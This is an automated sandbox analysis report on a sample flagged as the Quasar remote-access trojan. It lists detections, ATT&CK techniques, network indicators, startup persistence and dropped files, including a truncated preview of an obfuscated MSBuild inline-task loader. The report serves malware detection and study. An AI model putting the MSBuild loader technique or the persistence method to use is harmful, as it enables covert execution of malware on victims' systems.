Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.5120000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.5450000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3ae26f8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.37926f8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.MSBuild.exe.3a4f8b8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.MSBuild.exe.36ff8b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.449902016.0000000005120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.557407404.000000000386A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6656, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 6344, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation131	Startup Items1	Startup Items1	Disable or Modify Tools11	Input Capture11	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Native API11	DLL Side-Loading1	Exploitation for Privilege Escalation1	Deobfuscate/Decode Files or Information1	LSASS Memory	Peripheral Device Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Shared Modules1	Registry Run Keys / Startup Folder2	DLL Side-Loading1	Obfuscated Files or Information31	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Input Capture11	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Command and Scripting Interpreter2	Logon Script (Mac)	Access Token Manipulation1	Software Packing1	NTDS	System Information Discovery148	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection413	DLL Side-Loading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol13	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Registry Run Keys / Startup Folder2	File Deletion1	Cached Domain Credentials	Security Software Discovery131	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion41	Proc Filesystem	Virtualization/Sandbox Evasion41	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Access Token Manipulation1	/etc/passwd and /etc/shadow	Application Window Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Process Injection413	Network Sniffing	System Owner/User Discovery2	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Hidden Files and Directories1	Input Capture	Remote System Discovery1	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Rename System Utilities	Keylogging	System Network Configuration Discovery1	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ListSvc.exe	54%	Virustotal		Browse
ListSvc.exe	29%	Metadefender		Browse
ListSvc.exe	71%	ReversingLabs	Win32.Trojan.Quasar

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\wukkzmi2\wukkzmi2.dll	100%	Avira	HEUR/AGEN.1138338
C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll	100%	Avira	HEUR/AGEN.1138338
C:\Users\user\AppData\Local\Temp\atxm53jg\atxm53jg.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_isdecmp.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_setup64.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-HFMHC.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-IIFTV.tmp\ListSvc.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-SBL66.tmp\ListSvc.tmp	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_isdecmp.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_setup64.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\is-VFATP.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Roaming\AppLaunch.exe (copy)	3%	Metadefender		Browse
C:\Users\user\AppData\Roaming\AppLaunch.exe (copy)	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
23.2.RegAsm.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135947		Download File
38.2.RegAsm.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1135947		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.datacontract.org	0%	URL Reputation	safe
http://schemas.datacontract.org/2004/07/	0%	URL Reputation	safe
http://www.kymoto.orgAbout	0%	URL Reputation	safe
http://crt.se1p	0%	Avira URL Cloud	safe
http://www.kymoto.orgz/r	0%	Avira URL Cloud	safe
http://cscasha2.ocsp-certum.com04	0%	URL Reputation	safe
http://ip-api.com4	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
https://www.remobjects.com/ps	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
https://www.innosetup.com/	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://jrsoftware.org0	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/xClient.Core.Data	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/json/	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	ListSvc.exe, 00000000.00000000.347808146.0000000000401000.00000020.00020000.sdmp, ListSvc.exe, 00000002.00000000.353901673.0000000000401000.00000020.00020000.sdmp	false		high
http://freegeoip.net/xml/	MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	false		high
http://repository.certum.pl/ctnca.cer09	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
http://repository.certum.pl/cscasha2.cer0	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://schemas.datacontract.org	RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.certum.pl/ctnca.crl0k	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
http://schemas.datacontract.org/2004/07/	RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.kymoto.orgAbout	ListSvc.exe, 00000000.00000003.356884300.000000000229C000.00000004.00000001.sdmp, ListSvc.tmp, 00000001.00000003.354655794.0000000000D49000.00000004.00000001.sdmp, ListSvc.exe, 00000002.00000003.369531208.00000000021EC000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.359668587.00000000033F0000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crt.se1p	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.kymoto.org	ListSvc.tmp, 00000001.00000003.354806901.0000000000D8C000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366623577.00000000024EC000.00000004.00000001.sdmp	false		high
https://www.certum.pl/CPS0	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
http://crl.certum.pl/cscasha2.crl0q	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
https://jrsoftware.org/ishelp/index.php?topic=setupcmdline	ListSvc.exe	false		high
http://www.kymoto.orgz/r	ListSvc.exe, 00000000.00000003.356884300.000000000229C000.00000004.00000001.sdmp, ListSvc.exe, 00000002.00000003.369531208.00000000021EC000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cscasha2.ocsp-certum.com04	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com4	RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.remobjects.com/ps	ListSvc.tmp	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com01	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://www.innosetup.com/	ListSvc.tmp, ListSvc.tmp, 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp	false	URL Reputation: safe	unknown
http://ip-api.com	RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0D	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://api.ipify.org/	MSBuild.exe, 00000006.00000002.442679248.000000000351A000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.615009386.0000000000402000.00000040.00000001.sdmp, MSBuild.exe, 00000019.00000002.563475501.0000000005450000.00000040.00000001.sdmp, RegAsm.exe, 00000026.00000002.556345860.0000000000402000.00000040.00000001.sdmp	false		high
https://jrsoftware.org0	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://jrsoftware.org/	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	MSBuild.exe, 00000006.00000002.442341653.0000000002553000.00000004.00000001.sdmp, RegAsm.exe, 00000017.00000002.620101519.0000000003242000.00000004.00000001.sdmp, MSBuild.exe, 00000019.00000002.556425095.00000000028A2000.00000004.00000001.sdmp	false		high
http://schemas.datacontract.org/2004/07/xClient.Core.Data	RegAsm.exe, 00000017.00000002.620184713.0000000003256000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	ListSvc.tmp, 00000001.00000003.354526864.0000000000CF0000.00000004.00000001.sdmp, ListSvc.tmp, 00000003.00000003.366464447.0000000002450000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	false
89.38.99.64	unknown	Netherlands		49981	WORLDSTREAMNL	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	501764
Start date:	13.10.2021
Start time:	08:26:18
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 16s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ListSvc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@39/53@1/2
EGA Information:	Successful, ratio: 83.3%
HDC Information:	Successful, ratio: 19.7% (good quality ratio 19.4%) Quality average: 77.1% Quality standard deviation: 23.1%
HCA Information:	Successful, ratio: 51% Number of executed functions: 297 Number of non-executed functions: 188
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 51.11.168.232, 20.82.210.154, 51.104.136.2, 40.127.240.158, 23.203.141.148, 104.127.115.201, 20.54.110.249, 40.112.88.60, 52.251.79.25, 2.20.178.24, 2.20.178.33, 23.203.140.56, 20.50.102.62 Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, cdn.onenote.net.edgekey.net, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, cdn.onenote.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target MSBuild.exe, PID 6392 because it is empty Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:28:01	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ListSvc.lnk
08:28:08	API Interceptor	421x Sleep call for process: RegAsm.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\MSBuild.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	841
Entropy (8bit):	5.356220854328477
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoIvEE4xDqE4j:MxHKXwYHKhQnoPtHoxHwvEHxDqHj
MD5:	486580834B084C92AE1F3866166C9C34
SHA1:	C8EB7E1CEF55A6C9EB931487E9AA4A2098AACEDF
SHA-256:	65C5B1213E371D449E2A239557A5F250FEA1D3473A1B5C4C5FF7492085F663FB
SHA-512:	2C54B638A52AA87F47CAB50859EFF98F07DA02993A596686B5617BA99E73ABFCD104F0F33209E24AFB32E66B4B8A225D4DB2CC79631540C21E7E8C4573DFD457
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..2,"Microsoft.Build.Framework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.Build, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	701
Entropy (8bit):	5.333763980888323
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPk21q1KDLI4M9XKbbDLI4MWuPJKiUrRZ9I0ZKz:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pe
MD5:	BA746AE3F262831576BFC85A583D459B
SHA1:	454EF29E0DF1C81CD890FAAC211FFFCDE6ED37A3
SHA-256:	81F25A1B2B3AA48F1CA416DBDB0099493353B2A4EA667F688220A9E4D4355FC7
SHA-512:	2AE73EC4CCAEAFF14761FB3F53A2F7E166CBB7B3FA3BFCEF58D8EFC7CA6BF545D8DD0223C28CAA2B6213651AE4DC048C2FD6E99F1841DCF8CAF240434AB621B1
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Temp\ListSvc.url Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	995050
Entropy (8bit):	3.1455468631456025
Encrypted:	false
SSDEEP:	1536:D0bIbxbybnbeb5bbbzbhbfb1EyaB8J1zhz1tKHnCLQnMu+mP/5uGeLaeAEpjgyZe:octm7KFXHlrhS
MD5:	00FECA5191FF48C74192C719F7F8011A
SHA1:	1692160FEE1D7581715481C704E16004B5C02192
SHA-256:	CCC01534C2379A0B9F65674B2CC62BFC52B6A5AF3D027D33AC99165BC89ED26A
SHA-512:	F99EBB08F408190B373AD7F9006978CDEFF17CDB19363243D576536A7555AF77557CDAE8A3F3A4D9E6A5D787BA4ED2B3548D3AD2839E27AE3A3C0639D26FF734
Malicious:	false
Reputation:	unknown
Preview:	<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">..<Target Name="RVsqtTlOUIlLCbKpjAcrwQlHGZRXNxb"><PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb wHwYaCdltSSIRAnUCnoFqyEwpxxWs="$(MSBuildProjectFullPath)" fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr="$(MSBuildToolsPath)"/>..</Target>..<UsingTask TaskName="PMBzGdPIjJFpXNdMCswZwsxdbJLKucnb" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll"><ParameterGroup><wHwYaCdltSSIRAnUCnoFqyEwpxxWs ParameterType="System.String" Required="true" /><fnhvDTqqeLZolFEzPmAwQhhNHLYcaJDehToELmoHXEyCorfSaWzlXABXgtNRVnpuhUhrraODXSymJFyqGfbdjr ParameterType="System.String" Required="true" /></ParameterGroup><Task><Code Type="Class" Lang="cs">..<![CDATA[using System;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;using System.Runtime.InteropServices;using System.Runtime.InteropServices.ComTypes;using System.Diagnostics;using System.IO;us

C:\Users\user\AppData\Local\Temp\RES3401.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2204
Entropy (8bit):	2.7371114760727413
Encrypted:	false
SSDEEP:	24:ea8SaHnhhKEFWffI+ycuZhNBakSfPNnq9mpOy94:b8nHvKbH1ulBa39q9R
MD5:	B6B344CFB132988065702CF2430D6C01
SHA1:	57B897DA6CAE7B962A99E701E7B379BAB07D8212
SHA-256:	F0FEB287DD8B73B31AF73DF41BDE174FC4024DD2B1ACC54686424720D63D78F7
SHA-512:	EB7E55D112E5FEABB85177DFE3BDBA26089C03B6155EBA89B18CCB2FC11B75AC389ED2895855719B07DA87C0B292781DDB709D24882AD02CDAF72B9B2A400192
Malicious:	false
Reputation:	unknown
Preview:	........W....c:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP................j...\|.*&..~pkf............7.......C:\Users\user\AppData\Local\Temp\RES3401.tmp.-.<...................'...Microsoft (R) CVTRES.g.=..cwd.C:\Users\user\AppData\Roaming.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RESF3F6.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2204
Entropy (8bit):	2.7445113970856356
Encrypted:	false
SSDEEP:	24:eaSeaUrkOaHOhK2+axflI+ycuZhNvqakS0bPNnq9mpWy94:bSeaUrkLEKAx91ulSa3Wq95
MD5:	49096FB0A09C3834E5F92D8B19F9116D
SHA1:	E033710F4890BA6F51EC25BB68D52A2E5886B553
SHA-256:	6E723DF0C82C30F3B3331B14147DB6865251FE9222FF891C079873E10DC1C3F8
SHA-512:	60ED3D00DB79F80642E14FD639EE3487E42D64E4B76D810346F4921B3C229DA912204D5764DBA90AA0D66F5C139250EEAF3C570FAFF7853150D9136D03EB1A34
Malicious:	false
Reputation:	unknown
Preview:	........W....c:\Users\user\AppData\Local\Temp\wukkzmi2\CSC931589AEA7104917A111E4852BF690F6.TMP................`0...1...L97...........7.......C:\Users\user\AppData\Local\Temp\RESF3F6.tmp.-.<...................'...Microsoft (R) CVTRES.j.=..cwd.C:\Users\user\AppData\Local\Temp.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\atxm53jg\CSCE614293691B34F60A637EC21F5846844.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.114415079731639
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryq8ak7YnqqJRPN5Dlq5J:+RI+ycuZhNBakSfPNnqX
MD5:	6A17110B7CF62A26091A7E706B668505
SHA1:	9B8CF1E362D692DCA1C8A7ED75064BA2E16A136D
SHA-256:	295776CDF46AA9E17BDDDBC82DF34DB0A5FEDCD16B45A30D5048CF3B84CD906B
SHA-512:	56A97EDE767127AAAC3D01F62A9D61F87746A464B19C81930A773139B8605CC3251766186A7519744AACAA6842C66DCDF498223ECA3E40BF97635C448C45D132
Malicious:	false
Reputation:	unknown
